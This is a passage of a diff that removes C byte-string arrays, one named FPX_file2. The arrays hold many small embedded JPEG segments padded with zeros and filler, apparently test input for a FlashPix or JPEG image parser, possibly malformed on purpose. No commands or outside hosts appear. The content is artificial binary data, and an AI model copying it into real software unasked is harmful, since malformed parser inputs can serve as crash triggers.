-"\x73\xc5\x73\x53\xd9\x5c\x5d\xb5\xed\xf5\xbd\x84\xab\x63\x25\xcc" -"\x12\xb5\x9b\x26\xd6\xb8\x09\x9d\xed\xb0\xfa\xe5\x38\x38\x2d\xe5" -"\xfb\xd2\x6b\xd1\x36\xae\xb7\x33\xe9\xd6\x17\x2a\x12\xc2\x68\xa4" -"\x77\x81\xa3\x69\x8b\x01\xb6\x30\x08\x04\xe0\x82\x73\xdb\xa0\xea" -"\x68\x03\xa6\x7d\x53\x4f\x4b\x6f\xb4\x3d\xf5\xba\xc3\xb8\xa7\x98" -"\x64\x1b\x4b\x0e\xa3\x3e\xbc\x52\xc9\xa8\xd8\xc5\x66\xb7\x72\xde" -"\x5b\xa5\xb3\xe0\x2c\xc6\x40\x11\xb3\xe8\x7a\x56\x16\xb1\x65\x34" -"\x1a\xed\x9d\xda\x3d\xc4\x36\x71\xdb\x18\x50\xdb\x40\xb2\xf9\x2d" -"\x9c\x9f\x94\xa9\x20\x11\x81\x90\x3f\x87\x07\xad\x53\x92\xcb\xca" -"\xd2\x7e\xd5\xb3\x52\x4b\x83\x74\xf3\xc0\xcd\x68\xae\x43\x6c\xda" -"\x77\x44\xa3\x85\x71\x9e\x0e\x0e\x4e\x72\x09\xa0\x0e\xaa\xeb\x50" -"\xb2\xb3\x44\x7b\xbb\xb8\x20\x59\x3e\xe1\x92\x40\xbb\xbe\x99\xeb" -"\x4b\x2d\xf5\x9c\x36\x82\xee\x5b\xa8\x52\xdc\xe0\x89\x4b\x80\xa7" -"\x3d\x30\x7a\x56\x0d\xab\xcd\x63\xaa\xb5\xf6\xab\xa7\xcb\x9b\x9b" -"\x58\x84\x6d\x04\x46\x51\x6e\x42\xfc\xf1\x61\x41\x20\x6e\x39\x07" -"\xa1\xcf\xb5\x43\xa8\x5b\x3b\xc9\xa6\x5f\x5b\xda\x5d\x58\x59\xc4" -"\x66\x26\x38\xad\xd1\x9e\x27\x62\x31\x21\x8f\x07\xa8\x0d\xd0\x64" 
-"\x6e\xfa\xd0\x07\x48\xb7\xf6\x6f\x6c\xb7\x2b\x77\x01\x81\x8e\xd5" -"\x90\x48\x36\x93\x9c\x63\x3e\xb9\xa2\xd2\xfa\xd2\xf9\x19\xec\xee" -"\xa1\xb8\x55\x38\x63\x13\x86\x00\xfe\x15\xca\x1d\x31\xae\x6d\x24" -"\x93\xec\xf7\xb3\xa5\xce\xa1\x6c\xce\xb7\x10\xaa\x6f\x55\x71\xb9" -"\xf6\x28\x18\x18\xea\x58\x64\x85\x15\x73\x5c\xd3\xaf\x2e\x35\x0b" -"\xf5\xb1\x80\xed\x9a\xc2\x35\x20\x7c\x8b\x29\x59\x09\x31\xee\xec" -"\x4a\x92\x3f\xe0\x54\x01\xd3\xd1\x45\x14\x00\x51\x45\x14\x00\x51" -"\x45\x14\x00\x51\x45\x14\x00\x51\x45\x14\x00\x51\x45\x14\x00\x51" -"\x45\x14\x00\x51\x45\x14\x01\x88\x75\x3d\x52\x7b\xa7\xb3\xd3\xed" -"\x2d\x64\x9a\xd9\x54\x5c\xcb\x2c\xac\xb1\xab\x90\x0e\xc5\xc2\x92" -"\x78\x20\xe7\x8c\x64\x54\x30\xf8\x99\xcd\xb5\xdb\x5c\xe9\xd2\x45" -"\x73\x05\xd2\xda\x25\xb2\xb8\x63\x2c\x85\x41\x00\x1e\x06\x39\xce" -"\x7d\x06\x7d\xaa\x79\x2c\xb5\x3b\x1d\x52\xe6\xeb\x4a\x16\xd3\xc3" -"\x78\x43\xcb\x04\xee\x63\x29\x20\x50\xbb\x95\x80\x39\x04\x01\x90" -"\x47\x6e\x0f\x35\x4e\x2f\x0e\xea\x0f\x05\xdc\xb7\x57\xb0\xfd\xba" -"\x4b\xc4\xbd\x86\x58\xd0\xec\x46\x54\x0a\x14\x8c\xf2\xb8\x05\x7a" -"\xf2\x39\xeb\x40\x1a\x36\xb3\xeb\x26\xe1\x22\xd4\x34\xfb\x6f\x26" -"\x5c\x83\x25\xb5\xc1\x6f\x2b\x8f\xe2\x0c\x01\x39\xe9\x91\xf9\x56" -"\x4e\x97\xad\x4a\xb6\x5a\x4d\x96\x91\xa6\x86\x37\x76\x86\x74\x12" -"\xdc\x12\x22\x00\x8f\xbc\xc4\x12\x47\xcd\xfc\xab\x62\xd4\xeb\x92" -"\x5d\x46\x6f\x12\xc6\xde\x04\xce\xf1\x13\xb4\x8d\x21\xc7\x6c\x85" -"\xda\x33\xcf\x7e\x95\x4f\x44\xd0\xae\x34\xe9\x74\xd7\x96\x58\xdc" -"\x5a\x58\x35\xab\xed\xcf\x2c\x59\x0e\x47\xb7\xca\x68\x00\x6f\x11" -"\xfd\x96\xc2\xf1\xb5\x1b\x75\x4b\xcb\x49\x96\x06\x8a\x39\x01\x59" -"\x1d\xc0\x29\xb5\x8e\x30\x0e\xe1\xd7\xa6\x0f\xa5\x25\x97\x88\x65" -"\xfe\xd0\x82\xd7\x50\xfe\xcf\xff\x00\x4a\x62\x91\x3d\x9d\xd7\x9b" -"\xb5\xb0\x4e\xd6\x04\x03\xd0\x1e\x47\x19\xf4\xc8\xa2\xfb\xc3\xb2" -"\x5e\x4b\xa9\xc8\x66\x88\x3d\xc4\xf0\xdc\x5b\x96\x5d\xc1\x1a\x35" -"\x03\xe6\x1d\xc1\x20\xfe\x06\x9f\xa7\xe9\xb7\xa3\x50\x8a\x7b\x8b" 
-"\x3d\x32\xc6\x28\x41\xca\xda\xa6\xf6\x94\xe3\xfb\xc5\x46\xd1\xdf" -"\x8e\x7d\xe8\x02\x6f\x16\x4f\x25\xbf\x86\x2f\xde\x16\x2b\x2b\x47" -"\xe5\xa3\x0e\xa1\x98\x85\x1f\xa9\xa8\xbe\xdb\x73\x6d\xac\x43\xa0" -"\xe9\xf6\x88\xe9\x0d\xac\x72\xb4\xd2\xca\x40\x54\xdc\x53\x18\xc1" -"\x25\xb0\xbc\x53\xfc\x60\x8c\xfe\x16\xbd\x64\x1b\x8c\x4a\xb3\x63" -"\xd4\x23\x07\x3f\xa2\xd5\x88\x6c\xd9\xb5\xe9\x35\x44\x91\x1a\x19" -"\xad\x23\x85\x40\xeb\x90\xce\xd9\xfa\x61\x85\x00\x00\xff\xd9\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00" -"\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01" -"\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf4\xab" -"\x6d\x4f\x4f\xbb\x9d\xa1\xb5\xbe\xb7\x9e\x55\x19\x29\x1c\xa1\x88" -"\x1f\x41\x4a\x9a\x8d\x8b\xde\x1b\x34\xbc\xb7\x6b\x91\x9c\xc2\x24" -"\x05\x86\x3a\xf1\xd6\xb3\xa2\xb9\xb5\xbc\x68\x20\xb5\xd2\xee\x61" -"\x95\x11\xb6\x49\x25\xaf\x96\x2d\x4e\xd2\x3a\x9c\x0e\xf8\xc2\xe7" -"\xf2\xac\x0b\x1d\x3a\x6f\xec\xfb\x1d\x2e\x5f\xed\x31\x34\x52\x21" -"\x92\x34\xb5\x8d\x56\x36\x52\x09\x90\x4a\x57\x04\x64\x13\x90\x4b" -"\x1f\xa9\x34\x01\xd5\xeb\x3a\x8b\xe9\xb6\xb1\xc9\x15\xbf\xda\x25" -"\x96\x64\x85\x23\xdf\xb3\x25\x8e\x39\x3d\xaa\x0b\x4d\x5e\x63\x7d" -"\x1d\x9e\xa7\xa7\xc9\x63\x34\xd9\xf2\x5b\xcc\x12\x47\x21\x1c\x95" -"\x0c\x3a\x1c\x73\x82\x07\x00\xfa\x53\x3c\x4e\xb2\x7d\x92\xce\x58" -"\xe1\x96\x61\x0d\xec\x32\xba\xc4\x85\xd8\x28\x6e\x4e\x07\x26\xa1" -"\x92\x79\x75\xbd\x4e\xc5\x20\xb2\xbb\x82\xda\xd2\x6f\xb4\x49\x3d" -"\xc4\x46\x2c\x90\xac\x15\x54\x1e\x49\x3b\xb9\x38\xc0\x03\xde\x80" -"\x2e\xe9\x3a\xdd\xae\xab\x63\x25\xc5\xb6\x43\x44\x48\x92\x26\xfb" -"\xc8\x47\xf4\x3d\x41\xef\x54\xd7\xc4\x33\xdc\x7d\x9c\x58\x69\xa6" -"\xe2\x49\x2d\x23\xbc\x92\x33\x30\x46\x54\x7e\x81\x72\x3e\x63\xc1" -"\xf4\x1d\x39\xe6\xa9\xd8\xe9\x17\x91\xe8\x56\xb7\x56\x91\xf9\x3a" -"\x94\x28\xe8\xd1\x49\xf2\x89\x90\xb3\x1f\x2d\xbd\x3a\xe4\x1e\xc4" 
-"\xfa\x13\x9a\xd7\x2a\xf0\xe8\x76\x16\xf2\xe9\xd7\xf0\xea\x36\xd6" -"\x71\xfd\x92\xe6\xde\x32\xec\x25\xda\x01\x8c\x91\xc0\x19\x03\x21" -"\xbe\x52\x3e\x9c\x00\x76\x40\xe4\x03\x8c\x7b\x52\xd4\x70\x19\x0c" -"\x11\x99\xc2\x89\x76\x8d\xe1\x7a\x03\x8e\x71\x52\x50\x01\x45\x14" -"\x50\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14" -"\x50\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14\x50\x07\x3f\x1e" -"\xb5\xaa\x5d\xdb\x3e\xa1\xa6\xe9\x91\x4d\x60\xa5\xb6\x6f\x9c\xac" -"\xb3\xa8\x38\xdc\x8b\xb4\x80\x0f\x38\x04\xf3\xed\x9a\x96\x4d\x71" -"\xee\xde\xda\x0d\x12\x04\xb9\x96\xe2\xdc\x5d\x6f\x99\x8a\x47\x1c" -"\x67\xee\x96\xc0\x27\x24\xe4\x00\x07\x63\xe9\x51\x5b\xe9\xfa\xde" -"\x9b\x62\x74\xcd\x35\xac\xda\xdd\x72\xb0\x5c\x4a\xcc\x1e\x24\x27" -"\x80\x50\x0c\x31\x19\xc0\x39\x19\xc0\xcd\x3a\x3d\x16\xe3\x4a\x7b" -"\x59\xb4\x63\x1c\x9e\x4d\xaa\xda\x49\x0d\xc3\x15\x12\x22\x92\x55" -"\x83\x00\x70\xc0\x96\xec\x41\xcf\x6c\x50\x04\x1a\x9e\xab\x79\x36" -"\x81\xad\x5b\x3d\xb2\x5b\xea\x16\xb6\xec\x5d\x44\xa7\x69\x46\x53" -"\x89\x11\xb1\x9e\xc7\x8c\x0e\x46\x3d\xe9\x24\x92\xe2\x28\xbc\x33" -"\x79\x71\x84\x98\xcc\x20\x91\x63\x90\xb2\xb2\xbc\x6d\xdc\xe3\x3c" -"\xaa\x1a\xb1\xfd\x8d\x7b\x73\x69\xab\x4b\x7b\x2c\x02\xf7\x50\xb7" -"\x36\xea\xb1\xe4\xc7\x0a\x05\x60\xa3\x27\x93\xcb\x12\x4f\x1d\x7a" -"\x71\x4c\xd4\xe3\xc5\xdf\x87\x74\xbc\xee\x91\x26\xf3\x98\x8e\xcb" -"\x1c\x67\x27\xfe\xfa\x2a\x3f\x1a\x00\xe8\x68\xa2\x8a\x00\x28\xa2" -"\x8a\x00\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02" -"\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11" -"\x00\x3f\x00\xf5\x5a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80" -"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80" -"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80" -"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80" 
-"\x0a\x28\xa2\x80\x00\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01" -"\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02" -"\x11\x03\x11\x00\x3f\x00\xf5\x5a\x28\xa2\x80\x0a\x28\xa2\x80\x0a" -"\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a" -"\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a" -"\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a" -"\x28\xa2\x80\x0a\x28\xa2\x80\x00\xff\xd9\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00" -"\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03" -"\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\x28\xa2\x80\x0a\x28" -"\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28" -"\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28" -"\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28" -"\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x00\xff\xd9\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08" -"\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda" -"\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\x28\xa2" -"\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2" -"\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2" -"\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2" -"\x80\x0a\x28\xa2\x80\x0a\x28\xaa\x97\x5a\x95\x95\xa4\x82\x39\xee" -"\x14\x4a\xdd\x23\x5c\xb3\x9f\xf8\x08\xc9\xa6\x93\x7b\x09\xb4\xb7" -"\x2d\xd1\x50\x5d\x7d\xa4\xc2\x3e\xc7\xe5\x09\x09\x19\x32\xe7\x00" -"\x7d\x07\x53\xed\xc5\x36\xce\x0b\x88\x43\x9b\x9b\xb6\xb8\x76\x3f" -"\xdc\x0a\xab\xec\x00\xfe\xa4\xd1\x6d\x2e\x17\xd6\xc0\xff\xd9\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00" -"\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01" -"\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a" -"\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a" -"\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a" -"\x28\xa2\x80\x0a\x28\xaa\x2d\xaa\xda\x7d\xa0\x41\x0b\xb5\xc4\xb9" -"\xc1\x58\x54\xbe\xde\x71\xc9\x1c\x0f\xc6\x9a\x4d\xec\x26\xd2\xdc" -"\xbd\x45\x56\xbc\x8e\xee\x40\xab\x69\x3c\x70\x03\x9d\xee\xd1\xef" -"\x3f\x80\xce\x3f\x3a\x5b\x4b\x63\x6d\x19\x56\xb8\x9a\xe1\x98\xe4" -"\xbc\xa4\x13\xf8\x60\x00\x07\xd2\x8b\x68\x17\xd6\xc4\x29\xab\x5b" -"\x4d\x38\x8a\xd7\xcc\xb9\x3b\xb6\xb3\xc2\xb9\x44\xfa\xb7\x4f\xd7" -"\x35\x25\xe4\x37\x53\x14\x5b\x7b\xbf\xb3\x27\x3b\xc8\x8c\x33\x1f" -"\x4c\x13\xc0\xfc\x8d\x59\x00\x28\xc2\x80\x00\xec\x2a\x8e\xa5\xac" -"\xe9\xfa\x5a\xe6\xf2\xe5\x11\xbb\x46\x39\x73\xf4\x03\x9a\xa5\xab" -"\xf7\x51\x2f\x45\xef\x3f\xd0\x74\xfa\xad\x9c\x33\x79\x1e\x6f\x9b" -"\x36\x71\xe5\x44\x0b\xb0\xfa\x81\xd3\xf1\xa9\x6f\x16\xed\x91\x56" -"\xca\x48\x63\x62\x7e\x67\x91\x4b\x60\x7b\x00\x46\x4f\xe3\x52\xc7" -"\x14\x71\x67\xca\x8d\x53\x71\xc9\xda\x31\x93\xeb\x4f\xa5\x75\xd0" -"\x76\x6f\x72\xbd\x9d\xbc\xb0\x23\x79\xf7\x52\x5c\xbb\x1c\x96\x70" -"\x00\x1e\xc0\x01\xc0\xa9\x91\x12\x35\xdb\x1a\x2a\x2f\xa2\x8c\x0a" -"\x6c\xd3\x45\x6f\x11\x96\x79\x12\x24\x5e\xac\xe7\x00\x56\x1c\xbe" -"\x26\x17\x32\x98\x34\x2b\x39\x75\x19\x47\x06\x41\xf2\xc4\xbf\x56" -"\x34\xd4\x65\x3d\x89\x94\xe3\x0d\xcd\xf3\xc0\xc9\xac\x7b\xff\x00" -"\x13\x69\xf6\xb2\xf9\x10\x33\xde\xdc\x9e\x90\xdb\x0d\xe7\xf1\x23" -"\x81\x55\x7f\xb0\xf5\x3d\x53\xe6\xd7\xb5\x12\xb1\x1f\xf9\x74\xb4" -"\xf9\x53\xe8\x4f\x53\xfe\x79\xad\x9b\x0d\x36\xcb\x4e\x8f\xcb\xb2" -"\xb6\x8e\x10\x7a\x95\x1c\x9f\xa9\xea\x6a\xad\x08\xee\xee\x4d\xe7" -"\x2d\x95\x8c\x6f\x27\xc4\x5a\xc7\xfa\xe9\x57\x47\xb6\x3f\xc1\x1f" 
-"\xcf\x29\x1e\xe7\xb5\x5e\xd3\x7c\x3d\xa6\xe9\xaf\xe6\xc5\x07\x9b" -"\x3f\x53\x3c\xc7\x7b\x93\xeb\x93\xd3\xf0\xad\x5a\x29\x3a\x8d\xab" -; - - -unsigned char FPX_file2[] = -"\x2d\x11\x4a\x94\x53\xbb\xd5\x80\xff\xd9\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00" -"\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03" -"\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\x28\xa2\x80\x0a\x28" -"\xa2\x80\x0a\x28\xa2\x80\x0a\x29\x92\xc8\x90\xc4\xd2\xc8\x70\x88" -"\x32\x4e\x33\xc5\x55\xb5\xbf\x7b\xb9\x80\x8a\xce\x74\x83\x19\xf3" -"\xa5\x1b\x33\xf4\x53\xf3\x7e\x82\x9a\x4d\xea\x26\xd2\x76\x2e\xd1" -"\x48\x48\x00\x92\x70\x07\x7a\xa5\x0e\xa9\x0d\xcc\xeb\x1d\xac\x53" -"\xce\x84\xf3\x32\xa6\x23\x5f\xf8\x11\xc6\x7f\x0c\xd0\x93\x60\xda" -"\x5b\x97\xa9\xae\xeb\x1a\x33\xb9\xc2\xa8\xc9\x27\xb0\xaa\xf7\x76" -"\xd7\x17\x0e\xa2\x3b\xd7\xb7\x8b\x18\x61\x1a\x8d\xcd\xff\x00\x02" -"\x39\xc7\xe5\x52\x5b\xc2\x96\x96\xe2\x30\xee\x55\x72\x4b\x48\xe5" -"\x8f\xa9\x24\x9a\x2c\xac\x17\x77\x2b\xdb\x6a\x42\xee\x75\x5b\x6b" -"\x6b\x86\x84\xf5\x9d\x93\x62\xfe\x1b\xb0\x4f\xe0\x29\xf7\x76\x72" -"\xdd\x48\x3f\xd3\x66\x86\x10\x39\x48\x70\xa5\x8f\xfb\xdd\x7f\x2a" -"\xce\xbc\xf1\x45\x94\x73\x9b\x6b\x04\x97\x51\xba\xe9\xe5\xdb\x8c" -"\x81\xf5\x6e\x9f\xce\xa0\xfb\x16\xbf\xab\xf3\xa8\x5d\x8d\x32\xdc" -"\xff\x00\xcb\x0b\x53\x99\x0f\xd5\xbf\xc2\xb5\xe4\x6b\x57\xa1\x8b" -"\x9a\x7a\x2d\x7d\x0b\xb7\x5a\xbe\x95\xa2\x42\xb6\xf2\x5c\x65\xd7" -"\x85\x85\x49\x92\x43\xcf\xe2\x7f\x3a\xa5\xf6\xaf\x11\x6a\xfc\x59" -"\xdb\x26\x95\x6c\x7f\xe5\xad\xc0\xdd\x29\x1e\xcb\xdb\xf1\xfc\xeb" -"\x4b\x4c\xd0\xf4\xed\x2c\x66\xd6\xdd\x7c\xce\xf2\xbf\xcc\xe7\xf1" -"\x35\xa3\x4b\x9a\x31\xf8\x55\xfd\x7f\xc8\x7c\x92\x97\xc4\xec\xbb" -"\x2f\xf3\x21\xb4\xb7\xfb\x34\x3e\x5f\x9d\x34\xdc\xe4\xbc\xaf\xb9" -"\x8d\x17\x37\x56\xf6\x70\x99\x6e\xa6\x8e\x18\xc7\xf1\x3b\x00\x2b" 
-"\x0b\xfb\x4b\x5c\xd5\x8e\x34\xab\x2f\xb0\xdb\x9f\xf9\x78\xbb\x1f" -"\x31\xfa\x25\x4b\x6d\xe1\x7b\x5f\x38\x5c\xea\xb3\x4b\xa9\x5c\xff" -"\x00\x7a\x73\xf2\x8f\xa2\xf4\xc5\x37\x04\xb5\x9b\x05\x36\xf4\x82" -"\x23\x6f\x12\x4d\x7e\xe6\x2f\x0f\xd8\x49\x78\x73\x83\x71\x28\x29" -"\x10\xfc\x4f\x27\xf4\xa4\x5f\x0f\x5d\xea\x27\xcc\xf1\x06\xa0\xf3" -"\x8e\xbf\x66\x80\x94\x88\x7f\x53\x5d\x0a\x2a\xa2\x05\x45\x0a\xa0" -"\x60\x00\x30\x05\x3a\x97\xb4\xb7\xc0\xad\xf9\x87\xb2\xe6\xf8\xdd" -"\xff\x00\x22\x0b\x4b\x3b\x6b\x28\x44\x56\x90\x47\x0a\x0e\xc8\xb8" -"\xa9\xe8\xa2\xb2\x6e\xfb\x9a\xa5\x6d\x10\x56\x7e\xb1\xab\xdb\x69" -"\x16\xc2\x49\xc9\x79\x1c\xe2\x28\x53\x96\x91\xbd\x00\xa8\x75\x9d" -"\x72\x3d\x3d\xd2\xd6\xda\x33\x75\xa8\x4d\xc4\x56\xe9\xd7\xea\xde" -"\x82\xa2\xd1\xf4\x47\x8a\xe0\xea\x5a\xb4\x82\xeb\x51\x7f\xe2\xfe" -"\x18\x87\xf7\x54\x7f\x5f\xf2\x75\x8c\x12\x5c\xd3\xdb\xf3\x33\x94" -"\xdb\x7c\xb0\xdf\xf2\x36\xe8\xa2\x8a\xc8\xd4\x28\xa2\x8a\x00\x2b" -"\x0b\x57\xd6\xa6\xfb\x51\xd2\xf4\x58\xc5\xc6\xa0\x7e\xf3\x1f\xb9" -"\x00\xf5\x63\xeb\xed\xff\x00\xea\x30\xde\xea\xb7\x7a\xb5\xe3\xe9" -"\xba\x03\x61\x54\xe2\xe2\xfb\xaa\xc7\xec\xbe\xa7\xfc\xfb\x8d\x5d" -"\x27\x4a\xb5\xd2\x6d\x3c\x8b\x55\x39\x27\x2f\x23\x72\xce\xde\xa4" -"\xd6\xca\x2a\x1a\xcb\x7e\xdf\xe6\x62\xe4\xea\x69\x1d\xbb\xff\x00" -"\x91\x06\x8b\xa2\x45\xa6\x2b\x4d\x23\x9b\x8b\xd9\x79\x9a\xe1\xfe" -"\xf3\x1f\x41\xe8\x2b\x56\x8a\x2b\x29\x49\xc9\xdd\x9a\x46\x2a\x2a" -"\xc8\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff" -"\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11" -"\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00" -"\x3f\x00\xf5\x5a\x8e\x79\x56\x08\x5a\x57\x0c\x55\x46\x4e\xd5\x2c" -"\x7f\x00\x39\x35\x9f\xab\x7d\x96\x23\xe7\x6a\x3a\x9c\x96\xf6\xe0" -"\x7f\xaa\x59\x3c\xb0\xdf\x88\xf9\x8f\xd0\x1a\xcd\x87\x5a\xba\xbb" -"\x89\x6d\xfc\x35\xa6\x31\x85\x46\xd5\xb8\xb8\xca\x46\x07\xb0\xea" 
-"\x6b\x48\xd3\x6d\x5c\xca\x55\x14\x5d\x99\xbb\x6f\x78\x25\xb7\x69" -"\xe5\x86\x4b\x58\xd4\xf5\x9f\x0a\x71\xeb\x8c\xf1\xf8\xd5\x2b\x7f" -"\x10\xd8\x5d\xea\x4b\x65\x64\x65\xb9\x63\x9d\xd2\xc4\x99\x8d\x38" -"\xcf\x2d\x54\xd7\xc3\x4d\x74\xde\x7f\x88\x75\x09\x6f\x4a\xfc\xde" -"\x50\x3b\x22\x5f\xc0\x7f\x3e\x2a\xbf\xda\x24\xd5\x98\xe9\x9e\x1b" -"\x55\xb4\xd3\xe3\x3b\x67\xbc\x8d\x76\x83\xfe\xca\x7b\xfb\xff\x00" -"\x93\xa2\x84\x1d\xff\x00\xa4\x8c\xdd\x49\xab\x5f\xfe\x0b\xff\x00" -"\x23\x6e\x2d\x62\xc6\x7b\xdb\x8b\x58\x65\xf3\x24\xb6\x4d\xf2\x15" -"\x04\xaa\xfb\x67\xd6\x9b\xfd\xb5\x65\xfd\x8a\xba\xb1\x32\x0b\x52" -"\x33\x9d\x84\x91\xce\x3a\x0f\x7a\x20\xd3\x6d\x74\xbd\x22\x5b\x6b" -"\x38\x82\x20\x8d\x89\x3d\xd8\xe3\xa9\x3d\xcd\x56\xf0\x80\x0d\xe1" -"\x4b\x25\x60\x08\x28\x41\x07\xbf\xcc\x6a\x1a\x8d\xae\xbb\xa2\xd3" -"\x9d\xf9\x5f\x66\x4b\x75\xe2\x0d\x2a\xde\x0b\x79\x65\xb8\x0d\x05" -"\xc9\x2a\xb2\x2a\x96\x4e\x3a\xe4\x8e\x95\x75\x2e\xa1\x7b\x65\x9a" -"\xd8\x89\xe2\x3d\x1a\x1c\x30\x03\x1e\xdf\xd2\xb0\xef\xbc\x3b\x2d" -"\xab\xc9\x73\xa0\x32\x46\x5f\xfd\x6d\x94\xa3\x30\xcb\xf8\x76\x3f" -"\xe7\x8a\xcb\xb0\xb7\xb1\xb9\xbb\x68\xec\xa5\x9f\xc3\xfa\xb2\xfd" -"\xe8\x33\xf2\x39\xf6\x07\x82\x2b\x4f\x67\x09\x2b\xc5\xff\x00\x5f" -"\xd7\xa9\x9b\xa9\x38\xbb\x49\x7f\x5f\xd7\xa1\xbb\x65\xe1\x8b\x18" -"\x26\xfb\x45\xe1\x93\x50\xba\xea\x65\xb9\x3b\xbf\x21\xd0\x56\xb4" -"\xd3\x43\x6b\x6e\xd2\xcc\xeb\x14\x51\x8c\x96\x3c\x00\x2a\x3d\x42" -"\xfe\xdb\x4d\xb4\x7b\x9b\xc9\x44\x71\xaf\xaf\x52\x7d\x00\xee\x6b" -"\x06\x0b\x2b\xbf\x12\xcc\x97\x9a\xb2\x35\xbe\x9c\xa7\x74\x36\x7d" -"\xe4\xf4\x67\xff\x00\x0f\xf2\x63\x59\xfb\xd3\x7a\x7f\x5b\x1a\x3b" -"\x43\xdd\x82\xd7\xfa\xdc\x69\x6b\xcf\x16\x48\x56\x3f\x32\xd3\x45" -"\x07\x97\xc6\x1e\xe7\xd8\x7a\x2f\xf9\xfa\x74\x96\xd6\xd0\xda\x5b" -"\xa4\x16\xd1\x2c\x51\x20\xc2\xaa\x8c\x01\x52\x2a\xaa\x28\x55\x01" -"\x54\x0c\x00\x06\x00\x14\xb5\x13\x9f\x36\x8b\x44\x54\x21\xcb\xab" -"\xd5\x90\xdd\xff\x00\xc7\x9c\xdf\xf5\xcd\xbf\x95\x66\x78\x3f\xfe" 
